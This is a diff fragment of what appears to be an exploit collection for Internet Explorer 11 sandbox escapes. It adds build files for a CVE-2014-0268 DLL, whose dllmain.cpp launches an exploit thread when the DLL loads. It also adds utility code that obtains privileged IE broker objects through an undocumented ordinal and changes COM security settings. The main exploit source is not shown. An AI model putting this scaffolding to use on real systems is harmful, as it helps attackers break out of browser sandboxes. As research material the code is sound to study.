<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h" />
|
||||
<ClInclude Include="targetver.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="CVE-2014-0268.cpp" />
|
||||
<ClCompile Include="dllmain.cpp">
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
</PrecompiledHeader>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
|
||||
<Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
|
||||
</ProjectReference>
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,23 @@
|
|||
// dllmain.cpp : Defines the entry point for the DLL application.
|
||||
#include "stdafx.h"
|
||||
|
||||
DWORD CALLBACK ExploitThread(LPVOID hModule);
|
||||
|
||||
BOOL APIENTRY DllMain( HMODULE hModule,
|
||||
DWORD ul_reason_for_call,
|
||||
LPVOID lpReserved
|
||||
)
|
||||
{
|
||||
switch (ul_reason_for_call)
|
||||
{
|
||||
case DLL_PROCESS_ATTACH:
|
||||
CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
|
||||
break;
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
case DLL_PROCESS_DETACH:
|
||||
break;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// CVE-2014-0268.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,11 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
#include <windows.h>
|
||||
#include <Utils.h>
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|
154
external/source/exploits/IE11SandboxEscapes/CommonUtils/CommonUtils.vcxproj
vendored
Executable file
154
external/source/exploits/IE11SandboxEscapes/CommonUtils/CommonUtils.vcxproj
vendored
Executable file
|
@ -0,0 +1,154 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>CommandUtils</RootNamespace>
|
||||
<ProjectName>CommonUtils</ProjectName>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>StaticLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>StaticLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>StaticLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>StaticLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup />
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="regln.h" />
|
||||
<ClInclude Include="stdafx.h" />
|
||||
<ClInclude Include="targetver.h" />
|
||||
<ClInclude Include="Utils.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="regln.cpp">
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">NotUsing</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
<ClCompile Include="Utils.cpp" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,373 @@
|
|||
// This file is part of IE11SandboxEsacapes.
|
||||
|
||||
// IE11SandboxEscapes is free software: you can redistribute it and/or modify
|
||||
// it under the terms of the GNU General Public License as published by
|
||||
// the Free Software Foundation, either version 3 of the License, or
|
||||
// (at your option) any later version.
|
||||
|
||||
// IE11SandboxEscapes is distributed in the hope that it will be useful,
|
||||
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
// GNU General Public License for more details.
|
||||
|
||||
// You should have received a copy of the GNU General Public License
|
||||
// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
#include "Utils.h"
|
||||
|
||||
#include <strsafe.h>
|
||||
#include <sddl.h>
|
||||
#include <Shlwapi.h>
|
||||
|
||||
#pragma comment(lib, "shlwapi.lib")
|
||||
|
||||
static BOOL g_hasShDocIID;
|
||||
static IID g_shDocIID;
|
||||
|
||||
BOOL GetIIDForName(LPCWSTR lpName, IID* riid)
|
||||
{
|
||||
HKEY hRoot = nullptr;
|
||||
ULONG status;
|
||||
|
||||
status = RegOpenKeyEx(HKEY_CLASSES_ROOT, L"Interface", 0, KEY_ENUMERATE_SUB_KEYS, &hRoot);
|
||||
if (status == 0)
|
||||
{
|
||||
WCHAR keyName[128];
|
||||
DWORD index = 0;
|
||||
BOOL foundKey = FALSE;
|
||||
|
||||
while (true)
|
||||
{
|
||||
HKEY hSubKey;
|
||||
|
||||
status = RegEnumKeyW(hRoot, index, keyName, _countof(keyName));
|
||||
if (status != 0)
|
||||
{
|
||||
break;
|
||||
}
|
||||
|
||||
index++;
|
||||
|
||||
status = RegOpenKeyEx(hRoot, keyName, 0, KEY_QUERY_VALUE, &hSubKey);
|
||||
if (status != 0)
|
||||
{
|
||||
continue;
|
||||
}
|
||||
|
||||
DWORD dwType;
|
||||
WCHAR valueName[256];
|
||||
DWORD dwSize = sizeof(valueName)-sizeof(WCHAR);
|
||||
|
||||
status = RegQueryValueEx(hSubKey, nullptr, nullptr, &dwType, (BYTE*)valueName, &dwSize);
|
||||
RegCloseKey(hSubKey);
|
||||
|
||||
if ((status != 0) || (dwType != REG_SZ))
|
||||
{
|
||||
continue;
|
||||
}
|
||||
|
||||
// Ensure NUL terminate
|
||||
valueName[dwSize / sizeof(WCHAR)] = 0;
|
||||
|
||||
if (_wcsicmp(valueName, lpName) == 0)
|
||||
{
|
||||
foundKey = TRUE;
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
RegCloseKey(hRoot);
|
||||
|
||||
if (foundKey)
|
||||
{
|
||||
return SUCCEEDED(IIDFromString(keyName, riid));
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
DebugPrintf("Could not open Interface key %d\n", status);
|
||||
}
|
||||
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
REFIID GetSHDocIID()
|
||||
{
|
||||
if (!g_hasShDocIID)
|
||||
{
|
||||
memset(&g_shDocIID, 0, sizeof(g_shDocIID));
|
||||
|
||||
g_hasShDocIID;
|
||||
|
||||
GetIIDForName(L"ISHDocVwBroker", &g_shDocIID);
|
||||
}
|
||||
|
||||
return g_shDocIID;
|
||||
}
|
||||
|
||||
bstr_t GetTemp(LPCWSTR name)
|
||||
{
|
||||
WCHAR tempPath[MAX_PATH];
|
||||
|
||||
GetTempPath(MAX_PATH, tempPath);
|
||||
|
||||
PathAppend(tempPath, name);
|
||||
|
||||
return tempPath;
|
||||
}
|
||||
|
||||
bstr_t GetTempPath()
|
||||
{
|
||||
WCHAR tempPath[MAX_PATH];
|
||||
|
||||
GetTempPath(MAX_PATH, tempPath);
|
||||
|
||||
return tempPath;
|
||||
}
|
||||
|
||||
bstr_t WriteTempFile(LPCWSTR name, unsigned char* buf, size_t len)
|
||||
{
|
||||
WCHAR tempPath[MAX_PATH];
|
||||
|
||||
GetTempPath(MAX_PATH, tempPath);
|
||||
|
||||
PathAppend(tempPath, name);
|
||||
|
||||
FILE* fp = nullptr;
|
||||
|
||||
if (_wfopen_s(&fp, tempPath, L"wb") == 0)
|
||||
{
|
||||
fwrite(buf, 1, len, fp);
|
||||
|
||||
fclose(fp);
|
||||
|
||||
return tempPath;
|
||||
}
|
||||
else
|
||||
{
|
||||
return L"";
|
||||
}
|
||||
}
|
||||
|
||||
std::vector<unsigned char> ReadFileToMem(LPCWSTR name)
|
||||
{
|
||||
FILE* fp;
|
||||
std::vector<unsigned char> ret;
|
||||
|
||||
if (_wfopen_s(&fp, name, L"rb") == 0)
|
||||
{
|
||||
fseek(fp, 0, SEEK_END);
|
||||
|
||||
ret.resize(ftell(fp));
|
||||
fseek(fp, 0, SEEK_SET);
|
||||
|
||||
fread(&ret[0], 1, ret.size(), fp);
|
||||
|
||||
fclose(fp);
|
||||
}
|
||||
|
||||
return ret;
|
||||
}
|
||||
|
||||
void DebugPrintf(LPCSTR lpFormat, ...)
|
||||
{
|
||||
#ifdef _DEBUG
|
||||
CHAR buf[1024];
|
||||
va_list va;
|
||||
|
||||
va_start(va, lpFormat);
|
||||
|
||||
StringCbVPrintfA(buf, sizeof(buf), lpFormat, va);
|
||||
|
||||
OutputDebugStringA(buf);
|
||||
#endif
|
||||
}
|
||||
|
||||
bstr_t GetUserSid()
|
||||
{
|
||||
HANDLE hToken = nullptr;
|
||||
PTOKEN_USER pUser = nullptr;
|
||||
LPWSTR userName = nullptr;
|
||||
bstr_t ret;
|
||||
|
||||
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
|
||||
{
|
||||
DebugPrintf("Error opening process token: %d", GetLastError());
|
||||
goto error;
|
||||
}
|
||||
|
||||
//TOKEN_USER user = { 0 };
|
||||
DWORD retLength = 0;
|
||||
|
||||
if (!GetTokenInformation(hToken, TokenUser, nullptr, 0, &retLength))
|
||||
{
|
||||
if (GetLastError() != ERROR_INSUFFICIENT_BUFFER)
|
||||
{
|
||||
DebugPrintf("Error getting token information size: %d", GetLastError());
|
||||
goto error;
|
||||
}
|
||||
}
|
||||
|
||||
pUser = (PTOKEN_USER) new char[retLength];
|
||||
|
||||
if (!GetTokenInformation(hToken, TokenUser, pUser, retLength, &retLength))
|
||||
{
|
||||
DebugPrintf("Error getting token information: %d", GetLastError());
|
||||
goto error;
|
||||
}
|
||||
|
||||
if (!ConvertSidToStringSidW(pUser->User.Sid, &userName))
|
||||
{
|
||||
DebugPrintf("Error converting Sid to String: %d", GetLastError());
|
||||
goto error;
|
||||
}
|
||||
|
||||
ret = userName;
|
||||
|
||||
error:
|
||||
|
||||
if (hToken)
|
||||
{
|
||||
CloseHandle(hToken);
|
||||
}
|
||||
|
||||
if (pUser)
|
||||
{
|
||||
delete[] pUser;
|
||||
}
|
||||
|
||||
if (userName)
|
||||
{
|
||||
LocalFree(userName);
|
||||
}
|
||||
|
||||
return ret;
|
||||
}
|
||||
|
||||
typedef HRESULT(__stdcall *fCoCreateUserBroker)(IIEUserBroker** ppBroker);
|
||||
|
||||
GUID CLSID_CShdocvwBroker = { 0x9C7A1728,
|
||||
0x0B694, 0x427A, { 0x94, 0xA2, 0xA1, 0xB2, 0xC6, 0x0F, 0x03, 0x60 } };
|
||||
|
||||
void DisableImpersonation(IUnknown* pUnk)
|
||||
{
|
||||
IClientSecurity* sec = nullptr;
|
||||
|
||||
HRESULT hr = pUnk->QueryInterface(IID_PPV_ARGS(&sec));
|
||||
if (SUCCEEDED(hr))
|
||||
{
|
||||
hr = sec->SetBlanket(pUnk, RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_DEFAULT, nullptr, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_ANONYMOUS, nullptr, EOAC_NONE);
|
||||
DebugPrintf("SetBlanket: %08X", hr);
|
||||
sec->Release();
|
||||
}
|
||||
else
|
||||
{
|
||||
DebugPrintf("Error getting client security: %08X", hr);
|
||||
}
|
||||
}
|
||||
|
||||
void SetCloaking(IUnknown* pUnk)
|
||||
{
|
||||
IClientSecurity* sec = nullptr;
|
||||
|
||||
HRESULT hr = pUnk->QueryInterface(IID_PPV_ARGS(&sec));
|
||||
if (SUCCEEDED(hr))
|
||||
{
|
||||
hr = sec->SetBlanket(pUnk, RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_DEFAULT, nullptr, RPC_C_AUTHN_LEVEL_DEFAULT,
|
||||
RPC_C_IMP_LEVEL_IDENTIFY, nullptr, EOAC_DYNAMIC_CLOAKING);
|
||||
DebugPrintf("SetBlanket: %08X", hr);
|
||||
sec->Release();
|
||||
}
|
||||
else
|
||||
{
|
||||
DebugPrintf("Error getting client security: %08X", hr);
|
||||
}
|
||||
}
|
||||
|
||||
IIEUserBrokerPtr CreateBroker()
|
||||
{
|
||||
HMODULE hMod = LoadLibrary(L"iertutil.dll");
|
||||
|
||||
fCoCreateUserBroker pfCoCreateUserBroker = (fCoCreateUserBroker)GetProcAddress(hMod, (LPCSTR)58);
|
||||
|
||||
if (pfCoCreateUserBroker)
|
||||
{
|
||||
IIEUserBrokerPtr broker;
|
||||
|
||||
HRESULT ret = pfCoCreateUserBroker(&broker);
|
||||
|
||||
DebugPrintf("CreateBroker: %08X - %p", ret, broker);
|
||||
|
||||
return broker;
|
||||
}
|
||||
|
||||
return nullptr;
|
||||
}
|
||||
|
||||
IShdocvwBroker* CreateSHDocVw()
|
||||
{
|
||||
IIEUserBrokerPtr broker = CreateBroker();
|
||||
|
||||
if (broker != nullptr)
|
||||
{
|
||||
HRESULT ret;
|
||||
IShdocvwBroker* shdocvw;
|
||||
ret = broker->BrokerCreateKnownObject(CLSID_CShdocvwBroker, GetSHDocIID(), (IUnknown**)&shdocvw);
|
||||
DebugPrintf("IShdocvwBroker: %08X %p", ret, shdocvw);
|
||||
|
||||
if (SUCCEEDED(ret))
|
||||
{
|
||||
return shdocvw;
|
||||
}
|
||||
}
|
||||
|
||||
return nullptr;
|
||||
}
|
||||
|
||||
bstr_t GetWindowsSystemDirectory()
|
||||
{
|
||||
WCHAR buf[MAX_PATH];
|
||||
|
||||
GetSystemDirectory(buf, MAX_PATH);
|
||||
|
||||
return buf;
|
||||
}
|
||||
|
||||
bstr_t GetExecutableFileName(HMODULE hModule)
|
||||
{
|
||||
WCHAR buf[MAX_PATH];
|
||||
|
||||
::GetModuleFileNameW(hModule, buf, MAX_PATH);
|
||||
|
||||
return buf;
|
||||
}
|
||||
|
||||
bstr_t GetSessionPath()
|
||||
{
|
||||
std::wstringstream ss;
|
||||
|
||||
WCHAR objPath[MAX_PATH + 1] = { 0 };
|
||||
ULONG length = MAX_PATH;
|
||||
DWORD dwSessionId;
|
||||
|
||||
if (ProcessIdToSessionId(GetCurrentProcessId(), &dwSessionId))
|
||||
{
|
||||
ss << L"\\Sessions\\" << dwSessionId;
|
||||
|
||||
return ss.str().c_str();
|
||||
}
|
||||
|
||||
return L"";
|
||||
}
|
||||
|
||||
LSTATUS CreateRegistryValueString(HKEY hKey, LPCWSTR lpName, LPCWSTR lpString)
|
||||
{
|
||||
return RegSetValueEx(hKey, lpName, 0, REG_SZ, (const BYTE*)lpString, (wcslen(lpString) + 1) * sizeof(WCHAR));
|
||||
}
|
||||
|
||||
LSTATUS CreateRegistryValueDword(HKEY hKey, LPCWSTR lpName, DWORD d)
|
||||
{
|
||||
return RegSetValueEx(hKey, lpName, 0, REG_DWORD, (const BYTE*)&d, sizeof(d));
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "interfaces.h"
